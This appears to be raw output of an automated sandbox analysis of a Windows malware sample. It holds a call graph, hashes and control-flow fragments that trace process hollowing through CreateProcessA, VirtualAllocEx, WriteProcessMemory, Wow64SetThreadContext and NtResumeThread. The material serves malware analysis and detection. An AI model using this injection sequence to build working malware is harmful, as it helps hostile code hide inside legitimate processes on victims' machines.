6a2890a 66982->67007 67012 6a283c4 66982->67012 67017 6a284a4 66982->67017 67022 6a28e14 66982->67022 67028 6a28a14 66982->67028 67033 6a28c61 66982->67033 67038 6a28e31 66982->67038 67043 6a28db2 66982->67043 67048 6a28781 66982->67048 67053 6a2866a 66982->67053 66983 6a280c7 66983->66972 66995 6a280a5 66994->66995 66997 6a28db2 2 API calls 66995->66997 66998 6a28781 2 API calls 66995->66998 66999 6a28c61 2 API calls 66995->66999 67000 6a28e31 2 API calls 66995->67000 67001 6a28e14 2 API calls 66995->67001 67002 6a28a14 2 API calls 66995->67002 67003 6a283c4 2 API calls 66995->67003 67004 6a284a4 2 API calls 66995->67004 67005 6a2866a 2 API calls 66995->67005 67006 6a2890a 2 API calls 66995->67006 66996 6a280c7 66996->66972 66997->66996 66998->66996 66999->66996 67000->66996 67001->66996 67002->66996 67003->66996 67004->66996 67005->66996 67006->66996 67008 6a28914 67007->67008 67058 5d8e820 67008->67058 67062 5d8e818 67008->67062 67009 6a28ebc 67013 6a283ca 67012->67013 67066 6a2fde0 67013->67066 67070 6a2fde8 67013->67070 67014 6a28406 67018 6a284c0 67017->67018 67074 6a29898 67018->67074 67078 6a29888 67018->67078 67019 6a284d8 67023 6a28e21 67022->67023 67024 6a28781 67022->67024 67095 5d8f130 67024->67095 67099 5d8f138 67024->67099 67025 6a287e3 67032 6a28a1c 67028->67032 67029 6a28ab0 67029->66983 67103 5d8eac0 67032->67103 67107 5d8eab9 67032->67107 67034 6a28c70 67033->67034 67036 5d8eab9 WriteProcessMemory 67034->67036 67037 5d8eac0 WriteProcessMemory 67034->67037 67035 6a2815b 67035->66983 67036->67035 67037->67035 67039 6a28e3b 67038->67039 67041 5d8e818 VirtualAllocEx 67039->67041 67042 5d8e820 VirtualAllocEx 67039->67042 67040 6a28ebc 67041->67040 67042->67040 67044 6a28f5c 67043->67044 67045 6a2815b 67043->67045 67046 6a2fde0 Wow64SetThreadContext 67044->67046 67047 6a2fde8 Wow64SetThreadContext 67044->67047 67046->67045 67047->67045 67049 6a2878b 67048->67049 67051 5d8f138 NtResumeThread 67049->67051 67052 5d8f130 NtResumeThread 67049->67052 67050 6a287e3 67051->67050 67052->67050 67054 6a28679 67053->67054 67056 5d8eab9 WriteProcessMemory 67054->67056 67057 5d8eac0 WriteProcessMemory 67054->67057 67055 6a2815b 67056->67055 67057->67055 67059 5d8e860 VirtualAllocEx 67058->67059 67061 5d8e89d 67059->67061 67061->67009 67063 5d8e820 VirtualAllocEx 67062->67063 67065 5d8e89d 67063->67065 67065->67009 67067 6a2fde8 Wow64SetThreadContext 67066->67067 67069 6a2fe75 67067->67069 67069->67014 67071 6a2fe2d Wow64SetThreadContext 67070->67071 67073 6a2fe75 67071->67073 67073->67014 67075 6a298af 67074->67075 67076 6a298d1 67075->67076 67082 6a29d72 67075->67082 67076->67019 67079 6a29898 67078->67079 67080 6a29d72 2 API calls 67079->67080 67081 6a298d1 67079->67081 67080->67081 67081->67019 67083 6a29d81 67082->67083 67087 6a2f6d8 67083->67087 67091 6a2f6cc 67083->67091 67088 6a2f73c CreateProcessA 67087->67088 67090 6a2f8c4 67088->67090 67092 6a2f6d8 CreateProcessA 67091->67092 67094 6a2f8c4 67092->67094 67096 5d8f138 NtResumeThread 67095->67096 67098 5d8f1b5 67096->67098 67098->67025 67100 5d8f180 NtResumeThread 67099->67100 67102 5d8f1b5 67100->67102 67102->67025 67104 5d8eb08 WriteProcessMemory 67103->67104 67106 5d8eb5f 67104->67106 67106->67029 67108 5d8eac0 WriteProcessMemory 67107->67108 67110 5d8eb5f 67108->67110 67110->67029 67234 67c0c98 67235 67c0c9e 67234->67235 67236 67c0cc2 67235->67236 67242 67c261c 67235->67242 67245 67c27b0 67235->67245 67250 67c9393 67235->67250 67254 67c8d1a 67235->67254 67257 67c4f76 67235->67257 67261 67cfa20 67242->67261 67246 67c4f7a 67245->67246 67247 67c14d2 67246->67247 67269 6800fa8 67246->67269 67273 6800f98 67246->67273 67247->67236 67251 67c93ac 67250->67251 67253 67cfa20 VirtualProtect 67251->67253 67252 67c93d3 67253->67252 67256 67cfa20 VirtualProtect 67254->67256 67255 67c8d38 67256->67255 67259 6800f98 2 API calls 67257->67259 67260 6800fa8 2 API calls 67257->67260 67258 67c14d2 67258->67236 67259->67258 67260->67258 67263 67cfa47 67261->67263 67265 67cfe70 67263->67265 67266 67cfeb8 VirtualProtect 67265->67266 67268 67c14d2 67266->67268 67268->67236 67270 6800faa 67269->67270 67277 6800fe8 67270->67277 67274 6800f9c 67273->67274 67276 6800fe8 2 API calls 67274->67276 67275 6800fd5 67275->67247 67276->67275 67279 6800fec 67277->67279 67278 6800fd5 67278->67247 67282 68010f8 67279->67282 67286 6801100 67279->67286 67283 68010fc VirtualAlloc 67282->67283 67285 680117a 67283->67285 67285->67278 67287 6801102 VirtualAlloc 67286->67287 67289 680117a 67287->67289 67289->67278 67111 5d4ad93 67112 5d4ad9d 67111->67112 67116 5d8d761 67112->67116 67128 5d8d770 67112->67128 67113 5d4addb 67117 5d8d770 67116->67117 67118 5d8d79b 67117->67118 67140 6a20925 67117->67140 67145 6a21911 67117->67145 67150 6a20b4c 67117->67150 67155 6a201ac 67117->67155 67160 6a20b29 67117->67160 67165 6a2198f 67117->67165 67170 6a2018a 67117->67170 67175 6a20818 67117->67175 67180 6a20ea4 67117->67180 67118->67113 67129 5d8d785 67128->67129 67130 6a21911 2 API calls 67129->67130 67131 6a20ea4 2 API calls 67129->67131 67132 6a20925 2 API calls 67129->67132 67133 6a2018a 2 API calls 67129->67133 67134 6a20818 2 API calls 67129->67134 67135 6a20b29 2 API calls 67129->67135 67136 5d8d79b 67129->67136 67137 6a2198f 2 API calls 67129->67137 67138 6a20b4c 2 API calls 67129->67138 67139 6a201ac 2 API calls 67129->67139 67130->67136 67131->67136 67132->67136 67133->67136 67134->67136 67135->67136 67136->67113 67137->67136 67138->67136 67139->67136 67141 6a200f0 67140->67141 67142 6a200b7 67141->67142 67185 6a24568 67141->67185 67189 6a2455d 67141->67189 67142->67118 67147 6a200f0 67145->67147 67146 6a200b7 67146->67118 67147->67146 67148 6a24568 CopyFileA 67147->67148 67149 6a2455d CopyFileA 67147->67149 67148->67147 67149->67147 67154 6a200f0 67150->67154 67151 6a200b7 67151->67118 67152 6a24568 CopyFileA 67152->67154 67153 6a2455d CopyFileA 67153->67154 67154->67151 67154->67152 67154->67153 67156 6a200f0 67155->67156 67156->67155 67157 6a200b7 67156->67157 67158 6a24568 CopyFileA 67156->67158 67159 6a2455d CopyFileA 67156->67159 67157->67118 67158->67156 67159->67156 67162 6a200f0 67160->67162 67161 6a200b7 67161->67118 67162->67161 67163 6a24568 CopyFileA 67162->67163 67164 6a2455d CopyFileA 67162->67164 67163->67162 67164->67162 67166 6a200b7 67165->67166 67167 6a200f0 67165->67167 67166->67118 67167->67166 67168 6a24568 CopyFileA 67167->67168 67169 6a2455d CopyFileA 67167->67169 67168->67167 67169->67167 67171 6a200f0 67170->67171 67172 6a200b7 67171->67172 67173 6a24568 CopyFileA 67171->67173 67174 6a2455d CopyFileA 67171->67174 67172->67118 67173->67171 67174->67171 67177 6a200f0 67175->67177 67176 6a200b7 67176->67118 67177->67176 67178 6a24568 CopyFileA 67177->67178 67179 6a2455d CopyFileA 67177->67179 67178->67177 67179->67177 67182 6a200f0 67180->67182 67181 6a200b7 67181->67118 67182->67181 67183 6a24568 CopyFileA 67182->67183 67184 6a2455d CopyFileA 67182->67184 67183->67182 67184->67182 67186 6a245bd CopyFileA 67185->67186 67188 6a246bf 67186->67188 67190 6a24568 67189->67190 67190->67190 67191 6a2468c CopyFileA 67190->67191 67192 6a246bf 67191->67192 67193 5d4ab44 67194 5d4a9c2 67193->67194 67195 5d897d0 2 API calls 67194->67195 67196 5d897e0 2 API calls 67194->67196 67195->67194 67196->67194 67197 91c5c0 67198 91c606 67197->67198 67199 91c6f3 67198->67199 67202 91cba8 67198->67202 67205 91cb99 67198->67205 67203 91cbd6 67202->67203 67208 91c7d4 67202->67208 67203->67199 67206 91c7d4 DuplicateHandle 67205->67206 67207 91cbd6 67206->67207 67207->67199 67209 91cc10 DuplicateHandle 67208->67209 67211 91cca6 67209->67211 67211->67203 67294 5d4af65 67295 5d4af6f 67294->67295 67301 5d88690 67295->67301 67305 5d886a0 67295->67305 67296 5d4a9c2 67299 5d897d0 2 API calls 67296->67299 67300 5d897e0 2 API calls 67296->67300 67299->67296 67300->67296 67302 5d886a0 67301->67302 67309 5d8882f 67302->67309 67306 5d886b5 67305->67306 67308 5d8882f 2 API calls 67306->67308 67307 5d886cb 67307->67296 67308->67307 67311 5d8884e 67309->67311 67310 5d889a8 67311->67310 67314 5d894a0 67311->67314 67318 5d89498 67311->67318 67315 5d894e8 VirtualProtect 67314->67315 67317 5d89523 67315->67317 67317->67311 67319 5d894a0 VirtualProtect 67318->67319 67321 5d89523 67319->67321 67321->67311 67212 6a2e870 67213 6a2e8be NtProtectVirtualMemory 67212->67213 67215 6a2e908 67213->67215 67326 5d4afe0 67327 5d4afea 67326->67327 67333 5d84d58 67327->67333 67338 5d84d48 67327->67338 67328 5d4a9c2 67329 5d897d0 2 API calls 67328->67329 67330 5d897e0 2 API calls 67328->67330 67329->67328 67330->67328 67334 5d84d5e 67333->67334 67343 5d84d88 67334->67343 67348 5d84d98 67334->67348 67335 5d84d83 67335->67328 67339 5d84d58 67338->67339 67341 5d84d98 2 API calls 67339->67341 67342 5d84d88 2 API calls 67339->67342 67340 5d84d83 67340->67328 67341->67340 67342->67340 67345 5d84d98 67343->67345 67344 5d84e06 67344->67335 67345->67344 67353 5d88402 67345->67353 67357 5d88408 67345->67357 67349 5d84dc2 67348->67349 67350 5d84e06 67349->67350 67351 5d88408 SleepEx 67349->67351 67352 5d88402 SleepEx 67349->67352 67350->67335 67351->67349 67352->67349 67354 5d88408 SleepEx 67353->67354 67356 5d88486 67354->67356 67356->67345 67358 5d88448 SleepEx 67357->67358 67360 5d88486 67358->67360 67360->67345 67361 5d4abe1 67362 5d4abeb 67361->67362 67368 6a24948 67362->67368 67375 6a24938 67362->67375 67363 5d4a9c2 67364 5d897d0 2 API calls 67363->67364 67365 5d897e0 2 API calls 67363->67365 67364->67363 67365->67363 67369 6a2495d 67368->67369 67382 6a24e50 67369->67382 67391 6a24a9d 67369->67391 67400 6a24988 67369->67400 67409 6a24978 67369->67409 67370 6a24973 67370->67363 67376 6a24948 67375->67376 67378 6a24e50 4 API calls 67376->67378 67379 6a24988 4 API calls 67376->67379 67380 6a24978 4 API calls 67376->67380 67381 6a24a9d 4 API calls 67376->67381 67377 6a24973 67377->67363 67378->67377 67379->67377 67380->67377 67381->67377 67383 6a24a00 67382->67383 67383->67382 67384 6a24ab2 67383->67384 67385 6a24d8c 67383->67385 67418 6a25bb0 67383->67418 67422 6a25bb8 67383->67422 67384->67370 67426 6a25315 67385->67426 67430 6a25320 67385->67430 67394 6a24aa3 67391->67394 67392 6a24d8c 67398 6a25320 CreateFileA 67392->67398 67399 6a25315 CreateFileA 67392->67399 67393 6a24ab2 67393->67370 67394->67392 67394->67393 67396 6a25bb0 DuplicateHandle 67394->67396 67397 6a25bb8 DuplicateHandle 67394->67397 67395 6a24de1 67395->67370 67396->67394 67397->67394 67398->67395 67399->67395 67402 6a249b2 67400->67402 67401 6a24d8c 67407 6a25320 CreateFileA 67401->67407 67408 6a25315 CreateFileA 67401->67408 67402->67401 67403 6a24ab2 67402->67403 67405 6a25bb0 DuplicateHandle 67402->67405 67406 6a25bb8 DuplicateHandle 67402->67406 67403->67370 67404 6a24de1 67404->67370 67405->67402 67406->67402 67407->67404 67408->67404 67411 6a24988 67409->67411 67410 6a24d8c 67414 6a25320 CreateFileA 67410->67414 67415 6a25315 CreateFileA 67410->67415 67411->67410 67412 6a24ab2 67411->67412 67416 6a25bb0 DuplicateHandle 67411->67416 67417 6a25bb8 DuplicateHandle 67411->67417 67412->67370 67413 6a24de1 67413->67370 67414->67413 67415->67413 67416->67411 67417->67411 67419 6a25bb8 DuplicateHandle 67418->67419 67421 6a25c53 67419->67421 67421->67383 67423 6a25c00 DuplicateHandle 67422->67423 67425 6a25c53 67423->67425 67425->67383 67427 6a25320 CreateFileA 67426->67427 67429 6a2541b 67427->67429 67431 6a25372 CreateFileA 67430->67431 67433 6a2541b 67431->67433 67438 914528 67439 914536 67438->67439 67442 913cf4 67439->67442 67441 91453f 67443 913cff 67442->67443 67446 9140d0 67443->67446 67445 914565 67445->67441 67447 9140db 67446->67447 67450 9140e0 67447->67450 67449 914605 67449->67445 67451 9140eb 67450->67451 67454 914214 67451->67454 67453 9146e2 67453->67449 67455 91421f 67454->67455 67458 914244 67455->67458 67457 9147f4 67457->67453 67459 91424f 67458->67459 67465 915434 67459->67465 67461 917819 67461->67457 67462 9175f0 67462->67461 67470 91c2f8 67462->67470 67475 91c2e9 67462->67475 67466 91543f 67465->67466 67467 918dda 67466->67467 67480 918e38 67466->67480 67484 918e29 67466->67484 67467->67462 67471 91c319 67470->67471 67472 91c33d 67471->67472 67488 91c4a8 67471->67488 67492 91c49a 67471->67492 67472->67461 67476 91c319 67475->67476 67477 91c33d 67476->67477 67478 91c4a8 2 API calls 67476->67478 67479 91c49a 2 API calls 67476->67479 67477->67461 67478->67477 67479->67477 67481 918e7b 67480->67481 67482 918e86 KiUserCallbackDispatcher 67481->67482 67483 918eb0 67481->67483 67482->67483 67483->67467 67485 918e7b 67484->67485 67486 918e86 KiUserCallbackDispatcher 67485->67486 67487 918eb0 67485->67487 67486->67487 67487->67467 67490 91c4b5 67488->67490 67489 91c4ef 67489->67472 67490->67489 67496 91b030 67490->67496 67494 91c4b5 67492->67494 67493 91c4ef 67493->67472 67494->67493 67495 91b030 2 API calls 67494->67495 67495->67493 67497 91b03b 67496->67497 67499 91d208 67497->67499 67500 91c834 67497->67500 67499->67499 67501 91c83f 67500->67501 67502 914244 2 API calls 67501->67502 67503 91d277 67502->67503 67503->67499
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-1127353760
                                                                                  • Opcode ID: c11a01bc9ceebfaf0a07c4c5a24b1efad686b463bdd14d017d45fbfe08aaed35
                                                                                  • Instruction ID: 814b2b568353833a75fd8f63453ce47dfea8175cc66812312a26c4eea9b8c5df
                                                                                  • Opcode Fuzzy Hash: c11a01bc9ceebfaf0a07c4c5a24b1efad686b463bdd14d017d45fbfe08aaed35
                                                                                  • Instruction Fuzzy Hash: ECB20A34A00218DFDB14DFA9C998BADB7B6BF48300F15819AE505AB3A5CB74ED42CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq$4$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-569362799
                                                                                  • Opcode ID: ce7a1a194d0f31f0fa0a7fda5f6b93803bad9225dc332f687e41651a30a928f0
                                                                                  • Instruction ID: f322b1a99a3a2b8be2f2034659ab9633fff80dd95749c83008e8c6e80fe462a6
                                                                                  • Opcode Fuzzy Hash: ce7a1a194d0f31f0fa0a7fda5f6b93803bad9225dc332f687e41651a30a928f0
                                                                                  • Instruction Fuzzy Hash: 2F22DC34A00215CFDB24DFA4D998BADB7B6BF48300F158196E509AB3A5DB70ED82CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 0bac09c0fbd5cf7640557898b0ddb48ae2bf5c06e07ecaaafa4e76963e7c212c
                                                                                  • Instruction ID: 8aefb1bccd37324f8e59b7fa097c8b93960e74c4d20230e6ea3978fd2b655ef9
                                                                                  • Opcode Fuzzy Hash: 0bac09c0fbd5cf7640557898b0ddb48ae2bf5c06e07ecaaafa4e76963e7c212c
                                                                                  • Instruction Fuzzy Hash: 2302C374A05218CFEB64DFA8C984BA9BBF2FB49304F1081AAD509BB355DB709D81CF51
                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06A2E8F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: c978b85ef9df4e707de0aa02ed616ac079586c210a2800848a70a9200eb8b9a0
                                                                                  • Instruction ID: d4cead65c1b7f6dd9122e16f7d8b9cd8cd0d47beed4a8251962525f4c755058a
                                                                                  • Opcode Fuzzy Hash: c978b85ef9df4e707de0aa02ed616ac079586c210a2800848a70a9200eb8b9a0
                                                                                  • Instruction Fuzzy Hash: E921F0B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE559A7210C775A955CBA4
                                                                                  APIs
                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06A2E8F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: eaa52c9fa4c88f76ce50fab63d83429f81d76e4b0bc3e5de5510fdf117eea41f
                                                                                  • Instruction ID: 27922a530c5b9c794167a5231205adbce36e697d2b79337b282e557b569e9d65
                                                                                  • Opcode Fuzzy Hash: eaa52c9fa4c88f76ce50fab63d83429f81d76e4b0bc3e5de5510fdf117eea41f
                                                                                  • Instruction Fuzzy Hash: 1B21F2B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE459A7210C775A950CBA4
                                                                                  APIs
                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05D8F1A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 33c2adcd0b1f73dd46cee843ce72903eafb1cf6d47316993e171783820f24698
                                                                                  • Instruction ID: 4605bcb807bc51b080a2ca30081687c34ff13131d47324e0c98ebe1afd368353
                                                                                  • Opcode Fuzzy Hash: 33c2adcd0b1f73dd46cee843ce72903eafb1cf6d47316993e171783820f24698
                                                                                  • Instruction Fuzzy Hash: E71106B1D003099FDB10DFAAC884AAEFBF8FB49320F14842AD559A7250C775A944CFA5
                                                                                  APIs
                                                                                  • NtResumeThread.NTDLL(?,?), ref: 05D8F1A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 527e547de87e90bf66338d683675cfa9e6756fd4f763187e1f879f40984123fa
                                                                                  • Instruction ID: 9850dc746512aa8a126bba405c0be53e186ba1b38bfffa92500d43a02118460e
                                                                                  • Opcode Fuzzy Hash: 527e547de87e90bf66338d683675cfa9e6756fd4f763187e1f879f40984123fa
                                                                                  • Instruction Fuzzy Hash: E11117B1D003098FDB10DFAAC4846AEFBF4EF49320F10842AD459A7250C774A944CFA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 30a2d3365fb5f570e4828c5a53f10ea7bab726c58ebe5ab7a3ea6dd3a4dfa49c
                                                                                  • Instruction ID: 0db5bd2cb9433a61879c6eb58c9d939877a1e4c448dd4a744fb8fe4652996592
                                                                                  • Opcode Fuzzy Hash: 30a2d3365fb5f570e4828c5a53f10ea7bab726c58ebe5ab7a3ea6dd3a4dfa49c
                                                                                  • Instruction Fuzzy Hash: 58B1D770E05618CFDB54CFA9D984BADBBF2BF89300F60856AD509AB365DB349985CF00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: a91e8b32d948e6a424df212109c73b80cc75deb90c2692c1985bb1f437dddd78
                                                                                  • Instruction ID: 470692c54dfa42bfcb684e771b25ccbcce46ea584c451bf046cf4ca2ce2e1f92
                                                                                  • Opcode Fuzzy Hash: a91e8b32d948e6a424df212109c73b80cc75deb90c2692c1985bb1f437dddd78
                                                                                  • Instruction Fuzzy Hash: C1B1E770E05618CFDB54CFA9D984BADBBF2BF89300F54856AD409AB365EB349985CF00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a205c0a60199d44b5addfbf91a48a110094de5bd220bbc24a832c4774ba60d0
                                                                                  • Instruction ID: 9a5f7efab53bfff7338fdc151586788ee3570b575a9b9af9a6bc2b32dff76a66
                                                                                  • Opcode Fuzzy Hash: 4a205c0a60199d44b5addfbf91a48a110094de5bd220bbc24a832c4774ba60d0
                                                                                  • Instruction Fuzzy Hash: C1B1E570D04219CFEB64DF69D985BADBBF2FB49300F6484AAD049AB255DB7499C4CF00

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1351 5d660e8-5d66110 1353 5d66112-5d66159 1351->1353 1354 5d6615e-5d6616c 1351->1354 1403 5d665b5-5d665bc 1353->1403 1355 5d6616e-5d66179 call 5d63c10 1354->1355 1356 5d6617b 1354->1356 1359 5d6617d-5d66184 1355->1359 1356->1359 1361 5d6626d-5d66271 1359->1361 1362 5d6618a-5d6618e 1359->1362 1364 5d662c7-5d662d1 1361->1364 1365 5d66273-5d66282 call 5d61e30 1361->1365 1366 5d66194-5d66198 1362->1366 1367 5d665bd-5d665e5 1362->1367 1370 5d662d3-5d662e2 call 5d615e0 1364->1370 1371 5d6630a-5d66330 1364->1371 1381 5d66286-5d6628b 1365->1381 1368 5d661aa-5d66208 call 5d63950 call 5d643b8 1366->1368 1369 5d6619a-5d661a4 1366->1369 1373 5d665ec-5d66616 1367->1373 1413 5d6620e-5d66268 1368->1413 1414 5d6667b-5d666a5 1368->1414 1369->1368 1369->1373 1384 5d6661e-5d66634 1370->1384 1385 5d662e8-5d66305 1370->1385 1392 5d66332-5d6633b 1371->1392 1393 5d6633d 1371->1393 1373->1384 1387 5d66284 1381->1387 1388 5d6628d-5d662c2 call 5d65fb8 1381->1388 1411 5d6663c-5d66674 1384->1411 1385->1403 1387->1381 1388->1403 1401 5d6633f-5d66367 1392->1401 1393->1401 1417 5d6636d-5d66386 1401->1417 1418 5d66438-5d6643c 1401->1418 1411->1414 1413->1403 1423 5d666a7-5d666ad 1414->1423 1424 5d666af-5d666b5 1414->1424 1417->1418 1444 5d6638c-5d6639b call 5d61408 1417->1444 1421 5d664b6-5d664c0 1418->1421 1422 5d6643e-5d66457 1418->1422 1427 5d664c2-5d664cc 1421->1427 1428 5d6651d-5d66526 1421->1428 1422->1421 1449 5d66459-5d66468 call 5d61408 1422->1449 1423->1424 1425 5d666b6-5d666f3 1423->1425 1442 5d664d2-5d664e4 1427->1442 1443 5d664ce-5d664d0 1427->1443 1432 5d6655e-5d665ab 1428->1432 1433 5d66528-5d66556 call 5d63160 call 5d63180 1428->1433 1455 5d665b3 1432->1455 1433->1432 1450 5d664e6-5d664e8 1442->1450 1443->1450 1465 5d663b3-5d663c8 1444->1465 1466 5d6639d-5d663a3 1444->1466 1474 5d66480-5d6648b 1449->1474 1475 5d6646a-5d66470 1449->1475 1453 5d66516-5d6651b 1450->1453 1454 5d664ea-5d664ee 1450->1454 1453->1427 1453->1428 1461 5d664f0-5d66509 1454->1461 1462 5d6650c-5d66511 call 5d60208 1454->1462 1455->1403 1461->1462 1462->1453 1471 5d663fc-5d66405 1465->1471 1472 5d663ca-5d663f6 call 5d622b0 1465->1472 1467 5d663a7-5d663a9 1466->1467 1468 5d663a5 1466->1468 1467->1465 1468->1465 1471->1414 1480 5d6640b-5d66432 1471->1480 1472->1411 1472->1471 1474->1414 1476 5d66491-5d664b4 1474->1476 1481 5d66474-5d66476 1475->1481 1482 5d66472 1475->1482 1476->1421 1476->1449 1480->1418 1480->1444 1481->1474 1482->1474
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hoq$Hoq$Hoq
                                                                                  • API String ID: 0-3310881576
                                                                                  • Opcode ID: c4a3add87f209b65378cefec7973e5b6589d8171c4056a7f52d55c73c8653187
                                                                                  • Instruction ID: efb97c5869025e91386e50e246762193eb237094cd7964453f5fa80d475a4bb0
                                                                                  • Opcode Fuzzy Hash: c4a3add87f209b65378cefec7973e5b6589d8171c4056a7f52d55c73c8653187
                                                                                  • Instruction Fuzzy Hash: E7124E30A006059FCB25DFA9C995A6EBBF6FF88300F64852EE4069B355DB35EC46CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1493 5d67da0-5d67ddd 1495 5d67dff-5d67e15 call 5d67ba8 1493->1495 1496 5d67ddf-5d67de2 1493->1496 1502 5d6818b-5d6819f 1495->1502 1503 5d67e1b-5d67e27 1495->1503 1608 5d67de4 call 5d68710 1496->1608 1609 5d67de4 call 5d686b8 1496->1609 1499 5d67dea-5d67dec 1499->1495 1500 5d67dee-5d67df6 1499->1500 1500->1495 1510 5d681df-5d681e8 1502->1510 1504 5d67e2d-5d67e30 1503->1504 1505 5d67f58-5d67f5f 1503->1505 1507 5d67e33-5d67e3c 1504->1507 1508 5d67f65-5d67f6e 1505->1508 1509 5d6808e-5d680cb call 5d675b0 call 5d6a550 1505->1509 1512 5d67e42-5d67e56 1507->1512 1513 5d68280 1507->1513 1508->1509 1514 5d67f74-5d68080 call 5d675b0 call 5d67b40 call 5d675b0 1508->1514 1553 5d680d1-5d68182 call 5d675b0 1509->1553 1515 5d681ad-5d681b6 1510->1515 1516 5d681ea-5d681f1 1510->1516 1530 5d67e5c-5d67ef1 call 5d67ba8 * 2 call 5d675b0 call 5d67b40 call 5d67be8 call 5d67c90 call 5d67cf8 1512->1530 1531 5d67f48-5d67f52 1512->1531 1518 5d68285-5d68289 1513->1518 1604 5d68082 1514->1604 1605 5d6808b-5d6808c 1514->1605 1515->1513 1524 5d681bc-5d681ce 1515->1524 1520 5d681f3-5d68236 call 5d675b0 1516->1520 1521 5d6823f-5d68246 1516->1521 1522 5d68294 1518->1522 1523 5d6828b 1518->1523 1520->1521 1526 5d6826b-5d6827e 1521->1526 1527 5d68248-5d68258 1521->1527 1534 5d68295 1522->1534 1523->1522 1539 5d681d0-5d681d5 1524->1539 1540 5d681de 1524->1540 1526->1518 1527->1526 1542 5d6825a-5d68262 1527->1542 1583 5d67ef3-5d67f0b call 5d67c90 call 5d675b0 call 5d67860 1530->1583 1584 5d67f10-5d67f43 